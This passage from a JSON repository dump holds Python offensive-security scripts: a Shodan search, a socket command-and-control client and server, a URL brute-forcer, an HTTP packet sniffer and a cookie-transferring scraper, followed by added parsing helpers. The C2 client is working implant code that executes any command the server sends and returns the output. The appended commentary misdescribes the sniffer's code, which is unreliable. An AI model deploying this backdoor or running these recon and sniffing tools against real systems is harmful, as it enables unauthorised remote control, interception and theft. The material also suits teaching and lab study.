CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(api_key, search):\r\n\tapi = Shodan(api_key)\r\n\r\n\tfor result in api.search_cursor(search):\r\n\t\tprint(result['hostnames'])\r\n\r\nif __name__ == '__main__':\r\n\tapi_key = sys.argv[1]\r\n\tsearch = sys.argv[2]\r\n\t\r\n\tmain(api_key, search)\r\n"
  },
  {
    "path": "socket_c2_client.py",
    "content": "import socket\r\nimport subprocess\r\nimport sys\r\nimport time\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main():\r\n\tc2_server = '127.0.0.1'\r\n\tc2_port = 777\r\n\r\n\twith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\r\n\t\tsock.connect((c2_server, c2_port))\r\n\t\tlisten_commands(sock)\r\n\r\ndef listen_commands(sock):\r\n\tsock.sendall('check-in'.encode('utf-8'))\r\n\twhile True:\r\n\t\tcommand = sock.recv(1024).decode('utf-8')\r\n\t\tprint(f'Received command from server: {command}')\r\n\t\tif command == 'die':\r\n\t\t\tsys.exit(1)\r\n\t\tcommand_results = subprocess.getoutput(command)\r\n\t\tsock.sendall(command_results.encode('utf-8'))\r\n\r\nif __name__ == '__main__':\r\n\tmain()"
  },
  {
    "path": "socket_c2_server.py",
    "content": "import socket\r\nimport sys\r\nimport time\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main():\r\n\thost = '127.0.0.1'\r\n\tport = 777\r\n\twith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\r\n\t\tprint(f'Listening on {host} port {port}')\r\n\t\ts.bind((host,port))\r\n\t\ts.listen()\r\n\t\twhile True:\r\n\t\t\tconn, addr = s.accept()\r\n\t\t\twith conn:\r\n\t\t\t\tprint(f'Connection! {addr[0]}')\r\n\t\t\t\tlisten_results(conn)\r\n\r\ndef listen_results(conn):\r\n\twhile True:\r\n\t\tresults = conn.recv(4096).decode('utf-8')\r\n\t\tprint(f'-------- Received Message from Client --------')\r\n\t\tprint(results)\r\n\t\tcommand = input('Send command to client: ')\r\n\t\tconn.sendall(command.encode('utf-8'))\r\n\t\tif command == 'die':\r\n\t\t\tsys.exit(1)\r\n\r\nif __name__ == '__main__':\r\n\tmain()"
  },
  {
    "path": "web_brute.py",
    "content": "import requests\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(filename, base_url):\r\n\twith open(filename, 'r') as file:\r\n\t\tfor uri in file.readlines():\r\n\t\t\turl = f'{base_url}{uri.strip()}'\r\n\t\t\tcheck_url(url)\r\n\r\ndef check_url(url):\r\n\ttry:\r\n\t\th = {'user-agent':'firefox'}\r\n\t\tresponse = requests.get(url, headers=h)\r\n\t\tif response.status_code == 200:\r\n\t\t\tprint(f'{url} is good!')\r\n\texcept:\r\n\t\tprint(f'{url} is bad')\r\n\t\tpass\r\n\r\nif __name__ == '__main__':\r\n\tbase_url = sys.argv[1].rstrip('/')\r\n\tfilename = sys.argv[2]\r\n\tmain(filename, base_url)"
  },
  {
    "path": "web_robots.py",
    "content": "import sys\r\nimport requests\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(url):\r\n    # Fetch and print the site's robots.txt.\r\n    robot_url = f'{url}/robots.txt'\r\n    response = requests.get(robot_url)\r\n    print(response.text)\r\n\r\nif __name__ == \"__main__\":\r\n    # Strip a trailing slash so the path does not become '//robots.txt'.\r\n    url = sys.argv[1].rstrip('/')\r\n    main(url)\r\n"
  },
  {
    "path": "web_sniff.py",
    "content": "from scapy.all import Raw, sniff\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main():\r\n\t# Capturing packets requires root/administrator privileges.\r\n\tsniff(prn=http_header, filter=\"tcp port 80\")\r\n\r\ndef http_header(packet):\r\n\t# Only segments carrying a payload can hold an HTTP request;\r\n\t# SYN and bare ACK segments have no Raw layer.\r\n\tif not packet.haslayer(Raw):\r\n\t\treturn None\r\n\tpayload = bytes(packet[Raw].load)\r\n\t# str.find() returns -1 (truthy) when the needle is absent, so testing its\r\n\t# result as a boolean printed every packet; a membership test is what is meant.\r\n\tif b'GET' in payload:\r\n\t\treturn print_packet(packet)\r\n\treturn None\r\n\r\ndef print_packet(packet1):\r\n\tret = \"-------------------------------[ Received Packet ] -------------------------------\\n\"\r\n\tret += \"\\n\".join(packet1.sprintf(\"{Raw:%Raw.load%}\\n\").split(r\"\\r\\n\"))\r\n\tret += \"---------------------------------------------------------------------------------\\n\"\r\n\treturn ret\r\n\r\nif __name__ == '__main__':\r\n\tmain()"
  },
  {
    "path": "web_spa.py",
    "content": "import sys\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\nfrom requestium import Session\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(url):\r\n\t# drive a headless Chrome through requestium so the app's JavaScript runs before scraping;\r\n\t# a plain requests.get() against a single-page app only returns the empty shell\r\n\tsession = Session(webdriver_path='../Chrome Canary/chromedriver.exe',\r\n\t\tbrowser='chrome',\r\n\t\tdefault_timeout=6,\r\n\t\twebdriver_options={\r\n\t\t\t'arguments': [\r\n\t\t\t\t'disable-logging',\r\n\t\t\t\t'headless'\r\n\t\t\t]\r\n\t\t}\r\n\t)\r\n\r\n\tsession.driver.get(url)\r\n\t# block until the app has rendered the target div (up to 5 s)\r\n\tdiv_content = WebDriverWait(session.driver, 5).until(\r\n\t\tEC.presence_of_element_located(\r\n\t\t\t(By.XPATH, \"//div[@id='content']\")\r\n\t\t)\r\n\t)\r\n\tprint('######## FROM SELENIUM ########')\r\n\tprint(div_content.text)\r\n\r\n\tprint('######## COPYING SESSION FROM SELENIUM TO REQUESTS ########')\r\n\t# hand the browser's cookies (including any login session) to the requests side so\r\n\t# follow-up requests are fast and browserless. The User-Agent now differs from the\r\n\t# browser's; servers that bind a session to its UA will reject the transferred cookie.\r\n\tsession.transfer_driver_cookies_to_session()\r\n\tfinal_response = session.get(url, headers={'user-agent':'custom requestium'})\r\n\r\n\tsoup = BeautifulSoup(final_response.text, 'html.parser')\r\n\tprint('######## FROM REQUESTS ########')\r\n\tbody_text = soup.find(id=\"content\")\r\n\t# without JavaScript execution the div may be missing or empty; that is the comparison\r\n\tprint(body_text.text if body_text else '(no #content element in the raw HTML)')\r\n\r\nif __name__ == '__main__':\r\n\turl = sys.argv[1]\r\n\tmain(url)\r\n\r\n"
  }
]
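The two recon scripts above (the robots.txt fetcher and web_sniff.py) only print raw text. The block below is an added example, not code from this repository, showing the parsing step a practitioner would put behind them: it turns a robots.txt body into the paths each User-agent is told to avoid, and it parses a raw HTTP/1.x request payload the way a sniffer callback should, with the prefix test that web_sniff.py's str.find() check got wrong. The robots.txt body, the HTTP payload and the example.com host are constructed for the example; nothing is fetched or captured, so it runs offline.

```python
"""Offline helpers for the two recon scripts above (added example, not the
repository's own code): turn a robots.txt body into the paths it asks crawlers
to avoid, and parse a raw HTTP/1.x request payload the way a sniffer callback
should. All inputs below are constructed for the example."""
from typing import Dict, List

# Constructed robots.txt body; not fetched from any real host.
SAMPLE_ROBOTS = (
    "User-agent: *\r\n"
    "Disallow: /admin/        # hidden panel\r\n"
    "Disallow: /backup/db.sql\r\n"
    "Allow: /public/\r\n"
    "\r\n"
    "User-agent: Googlebot\r\n"
    "Disallow: /staging/\r\n"
    "Sitemap: https://example.com/sitemap.xml\r\n"
)

# Constructed TCP payload, as scapy would expose it in packet[Raw].load.
SAMPLE_PAYLOAD = (
    b"GET /login?next=/admin HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"User-Agent: curl/8.0\r\n"
    b"Cookie: session=abc123\r\n"
    b"\r\n"
)

HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ", b"PATCH ")


def parse_robots(text: str) -> Dict[str, List[str]]:
    """Map each User-agent to its Disallow paths.

    Disallow entries are the recon value of robots.txt: the owner lists paths
    they do not want indexed, which regularly includes admin panels, backups
    and staging trees. Consecutive User-agent lines share one rule set.
    """
    groups: Dict[str, List[str]] = {}
    agents: List[str] = []          # user-agents of the group being built
    seen_rule = False               # a rule line closes the current User-agent run
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and padding
        field, sep, value = line.partition(":")
        if not sep:
            continue                            # blank or malformed line
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            if seen_rule:
                agents, seen_rule = [], False
            agents.append(value)
            groups.setdefault(value, [])
        elif field in ("allow", "disallow"):
            seen_rule = True
            if field == "disallow" and value:   # an empty Disallow means "allow all"
                for agent in agents:
                    groups[agent].append(value)
    return groups


def is_http_request(payload: bytes) -> bool:
    """True when the payload opens with an HTTP request line.

    web_sniff.py tested str(packet).find('GET'); find() returns -1 on a miss,
    which is truthy, so that test passed every packet. Test the prefix instead.
    """
    return payload.startswith(HTTP_METHODS)


def parse_http_request(payload: bytes) -> Dict[str, object]:
    """Split a request payload into method, path, version, headers and body."""
    if not is_http_request(payload):
        raise ValueError("payload does not start with an HTTP request line")
    head, _, body = payload.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")   # latin-1 never fails to decode
    method, path, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()   # header names are case-insensitive
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


if __name__ == "__main__":
    for agent, paths in parse_robots(SAMPLE_ROBOTS).items():
        print(f"{agent}: {paths}")
    req = parse_http_request(SAMPLE_PAYLOAD)
    print(req["method"], req["path"], req["headers"].get("cookie"))
```

To use it with the scripts above, feed `response.text` from the robots.txt fetcher to `parse_robots()` and `packet[Raw].load` from the sniffer callback to `parse_http_request()`; only the first segment of a request carries the request line, so continuation segments of a large POST will fail the prefix test and should be skipped or reassembled.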